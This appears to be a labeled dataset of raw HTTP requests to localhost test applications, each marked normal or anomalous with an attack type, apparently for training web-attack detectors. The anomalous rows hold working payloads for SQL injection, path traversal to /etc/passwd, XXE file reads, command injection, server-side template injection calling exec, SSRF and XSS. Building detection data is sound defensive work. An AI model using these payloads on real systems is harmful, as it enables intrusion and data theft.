raw_request stringlengths 12 206k | label stringclasses 2
values | attack_type stringclasses 24
values |
|---|---|---|
GET /Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== HTTP/1.1
Host: localhost:3000
User-Agent: Fuzz Faster U Fool v2.1.0
Accept-Encoding: gzip | anomalous | Local_File_Inclusion |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=C9C8FC80B4EBE614059ECA83C64D77BD
Host: localhost
Content-Type: application/json
Connection: close
Content-Length: 107
{"id": "%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66etc%%32%%66passwd", "action": "search"} | anomalous | Directory_Traversal |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: d074080f-a611-4ddf-ab00-ed0377e783d2 | normal | null |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: passthru($_GET[c], '%0dr'%0d);
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=6A75D2A9F9698C63E6EEF9014923CC2D
Host: localhost
Connection: close | anomalous | Remote_Code_Execution |
GET /rest/products/search?q=glass&cache_id=c6260a81-e895-4741-aa7d-67fc0b83df21 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: c6260a81-e895-4741-aa7d-67fc0b83df21 | normal | null |
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1%20dUpc%2C%3BWAITFOR%20DELAY%20%270%3A0%3A5%27%20kSuf; security=low
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15
Referer: http://localhost/vulnerabilities/sqli/
Host: localhost
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close | anomalous | SQL Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 64124140-d474-4a1a-9bd5-1b092a360c15 | normal | null |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=5C7A65F5D4EEA3A40A051E35716036D0
Host: localhost
Content-Type: application/xml
Connection: close
Content-Length: 135
<?xml version="1.0" encoding="UTF-8"?>
<user>
<id>%f0%80%80%ae%f0%80%80%ae%u2215etc%u2215passwd</id>
<name>admin</name>
</user> | anomalous | Directory_Traversal |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=7035CE87E877A9DA937D48D6F0C3B04E
Host: localhost
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 49
id=false%20or%20%27a%27%3D%27a%20--&submit=Submit | anomalous | SQL_Injection |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: %20ping -n 7 127.0.0.1#
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=F59F708FB88CAD54E0B723CB6E9BC10F
Host: localhost
Connection: close | anomalous | Command_Injection |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=7ECBE88234BCDAEF3A8381286AF82EF3
Host: localhost
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 118
id=%25c0%255e%25c0%255e%25u2215%25c0%255e%25c0%255e%25u2215%25c0%255e%25c0%255e%25u2215etc%25u2215passwd&submit=Submit | anomalous | Directory_Traversal |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=B1634F2D6FAD77A3D3AB66A1FBFC5B62
Referer: http://malicious.com/file://017700000001:80
Host: localhost
Connection: close | anomalous | Server-Side_Request_Forgery |
GET /rest/products/search?q=glass&cache_id=d0730271-14e4-4b73-8b99-9fe6ad3c9054 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: d0730271-14e4-4b73-8b99-9fe6ad3c9054 | normal | null |
GET /rest/products/search?q=%74%65%73%74%22%29%2F%2A%21%41%73%2A%2F%43%63%78%42%2F%2A%21%77%48%45%52%45%2A%2F%36%30%37%39%3D%36%30%37%39%2F%2A%21%41%4E%64%2A%2F%65%4C%74%28%33%39%34%39%2F%2A%21%62%45%74%77%45%65%4E%2A%2F%33%39%34%39%2F%2A%21%41%4E%64%2A%2F%33%39%34%39%2C%36%37%33%34%29%2D%2D%2F%2A%2A%2F%71%4B%67%76 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0
Referer: http://localhost:3000/rest/products/search
Host: localhost:3000
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close | anomalous | SQL Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: e17fec90-e954-4294-a24e-cbdacedef60b | normal | null |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: <?xml version="1.0" encoding="utf-8"?><!DOCTYPE foo [<!ENTITY leak SYSTEM "file://\/var\/log\/nginx\/access.log"> ]><log>&leak;</log>
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=4A1691C665181A72821B7B94E61437CA
Host: localhost
Connection: close | anomalous | XML_External_Entity |
GET /vulnerabilities/sqli/?id=| ls -l /etc/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=BA197ABC97A09400DA6E6FC9BB3D5B94
Host: localhost
Connection: close | anomalous | Command_Injection |
GET /login.php HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=331mt6t74ifgbsopqhr92feud2; path=/;security=low
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15
Referer: http://localhost/vulnerabilities/sqli/
Host: localhost
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close | anomalous | SQL Injection |
GET /?ref=2b3f6ee0-215e-4036-891c-107addb83192&session_token=8992 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 2b3f6ee0-215e-4036-891c-107addb83192 | normal | null |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: a07211b2-8610-4059-8261-94c9e0bab2dd | normal | null |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=BEB3A09DA03425771CD5B80213234877
Host: localhost
Content-Type: application/xml
Connection: close
Content-Length: 259
<?xml version="1.0" encoding="UTF-8"?>
<user>
<id><marquee direction="right" scrollamount="25" style="font-size:120px;color:lime;background:black;position:fixed;top:0;width:100%;z-index:999999;">!!! HACKED !!!</marquee></id>
<name>admin</name>
</user> | anomalous | HTML_Injection |
GET /?ref=7302747c-0600-4134-82c3-d713b0673897&session_token=7119 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 7302747c-0600-4134-82c3-d713b0673897 | normal | null |
GET /rest/products/search?q=orange&cache_id=7df518f2-8d2b-489b-ba16-77af52d53a74 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 7df518f2-8d2b-489b-ba16-77af52d53a74 | normal | null |
GET /login.php HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15
Referer: http://localhost/vulnerabilities/sqli/"))) AND (SELECT (CASE WHEN (5433=3415) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,5433) END) FROM DUAL) IS NULL AND ((("xmKS" LIKE "xmKS
Host: localhost
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close | anomalous | SQL Injection |
GET /rest/products/search?q=..%c1%9c..%c1%9c..%c1%9c{FILE} HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=185C3289254398A4D18E1B757A2AD79F
Host: localhost:3000
Connection: close | anomalous | Directory_Traversal |
GET /login.php HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15
Referer: http://localhost/vulnerabilities/sqli/")) AS iyaR WHERE 6788=6788 RLIKE (SELECT (CASE WHEN (1348=6104) THEN 0x687474703a2f2f6c6f63616c686f73742f76756c6e65726162696c69746965732f73716c692f ELSE 0x28 END))-- UlqO
Host: localhost
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close | anomalous | SQL Injection |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=3C1EA5C0CD515C873FA039CEC6E189CB
Referer: http://malicious.com/<?xml version="1.0" encoding="utf-8"?><!DOCTYPE foo [<!ENTITY conf SYSTEM "file://C:/xampp/apache/logs/access.log%09"> ]><xml>&conf;</xml>
Host: localhost
Connection: close | anomalous | XML_External_Entity |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: %22 or '8604'='8604 --
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=D2D2E313B2D0DE86B12BC01FB678133D
Host: localhost
Connection: close | anomalous | SQL_Injection |
GET /rest/products/search?q=sale&cache_id=dcf84252-d112-470c-9551-5a2e19085765 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: dcf84252-d112-470c-9551-5a2e19085765 | normal | null |
GET /login.php HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15")) AND 1594=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (("xMuz"="xMuz
Referer: http://localhost/vulnerabilities/sqli/
Host: localhost
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close | anomalous | SQL Injection |
GET /vulnerabilities/sqli/?id=dict:///%5c/127.0.0.0:3389 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=A76ABD9F632D176B9CC4440B0F74C2BF
Host: localhost
Connection: close | anomalous | Server-Side_Request_Forgery |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 39b77fb8-2392-4875-9910-7d821381ac42 | normal | null |
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip | anomalous | Advanced Vulnerability Scan |
GET /rest/products/search?q=%20%3BYUI=%24%28echo%20TNKBDH%20%3E%20/tmp/CPXGLC.txt%29%3BYUI=%24%28cat%20/tmp/CPXGLC.txt%29%3BYUI1=%24%7B%23YUI%7D%3Bif%20%5B%206%20-eq%20%24%7BYUI1%7D%20%5D%3Bthen%20sleep%201%3Bfi%27 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: commix/v4.2.dev1 (https://commixproject.com)
Referer: http://localhost:3000/rest/products/search
Host: localhost:3000
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close | anomalous | Command Injection |
GET /rest/products/search?q=fruit&cache_id=4a41d711-6c0e-47e4-a489-6ea2bd2ba116 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 4a41d711-6c0e-47e4-a489-6ea2bd2ba116 | normal | null |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: %3Ffile%3D%250DSet-Cookie%3Acrlf%3Dinjection
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=1EA14DD116B657275DD4C9AAA94BA386
Host: localhost
Connection: close | anomalous | CRLF_Injection |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=B56D8BC03181FF580591FCCEA9942E12
Referer: http://malicious.com/<?xml version="1.0" encoding="utf-8"?><!DOCTYPE foo [<!ENTITY blind SYSTEM "file://\/etc\/nginx\/nginx.conf"> ]><xxe>&blind;</xxe>
Host: localhost
Connection: close | anomalous | XML_External_Entity |
GET /rest/products/search?q=sale&cache_id=2a68760f-152f-4bfb-8d75-740775d50b18 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 2a68760f-152f-4bfb-8d75-740775d50b18 | normal | null |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=576C8E5904E85A3380A723ACCBD451BC
Host: localhost
Content-Type: application/json
Connection: close
Content-Length: 101
{"id": "%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8s%c0.%c0.%c1%8setc%c1%8spasswd", "action": "search"} | anomalous | Directory_Traversal |
GET /login.php HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; path=/;security=low%22%29%29%20OR%202143%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28101%29%7C%7CCHR%28108%29%7C%7CCHR%28119%29%2C5%29--
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15
Referer: http://localhost/vulnerabilities/sqli/
Host: localhost
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close | anomalous | SQL Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: ac60db74-9f77-406c-a3dc-cc62f848ca1c | normal | null |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=E32B533F1D592923649F937B1E7F9142
Host: localhost
Content-Type: application/json
Connection: close
Content-Length: 87
{"id": "'<input autofocus onfocus=setTimeout(`self.alert(1)`,0)>'", "action": "search"} | anomalous | Cross-Site_Scripting |
GET /?ref=3215ff27-01d4-44dc-b7d2-59cad4ae3f9c&session_token=7200 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 3215ff27-01d4-44dc-b7d2-59cad4ae3f9c | normal | null |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: <?xml version="1.0" encoding="utf-8"?><!DOCTYPE foo [<!ENTITY data SYSTEM "file://C:/xampp/apache/logs/access.log "> ]><response>&data;</response>
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=DA13AB8BD43F831E6DB2CBF7CFB8EC91
Host: localhost
Connection: close | anomalous | XML_External_Entity |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=0FB17BDE7214A8F23E109295E526AD58
Host: localhost
Content-Type: application/json
Connection: close
Content-Length: 142
{"id": "{{ _self.env.registerUndefinedFilterCallback('exec') }}{{ _self.env.getFilter('id') }}/* comment *//* comment */", "action": "search"} | anomalous | Server-Side_Template_Injection |
GET /api/Challenges?page=drink HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
Referer: http://127.0.0.1:3000/account | normal | null |
GET /login.php HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15
Referer: http://localhost/vulnerabilities/sqli/) WHERE 1897=1897 OR 2996=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)--
Host: localhost
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close | anomalous | SQL Injection |
GET /rest/products/search?q=%20%3BYUI=%24%28echo%20SBEVQV%29%3BYUI1=%24%7B%23YUI%7D%3Bif%20%5B%205%20-eq%20%24YUI1%20%5D%3Bthen%20sleep%201%3Bfi%20%23 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: commix/v4.2.dev1 (https://commixproject.com)
Referer: http://localhost:3000/rest/products/search
Host: localhost:3000
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close | anomalous | Command Injection |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=8447557705FD9AEB4562ECE195474149
Host: localhost
Content-Type: application/xml
Connection: close
Content-Length: 124
<?xml version="1.0" encoding="UTF-8"?>
<user>
<id>true union select null,null,null--</id>
<name>admin</name>
</user> | anomalous | SQL_Injection |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=848CF8BC997CA1DA6ECCE6C6D6022C1F
Host: localhost
Content-Type: application/xml
Connection: close
Content-Length: 290
<?xml version="1.0" encoding="UTF-8"?>
<user>
<id><script>document.location="/transfer?<input type="hidden" name="admin" value="attacker"><input type="hidden" name="currency" value="1000000"><input type="hidden" name="currency80" value="0">"</script></id>
<name>admin</name>
</user> | anomalous | Cross-Site_Request_Forgery |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
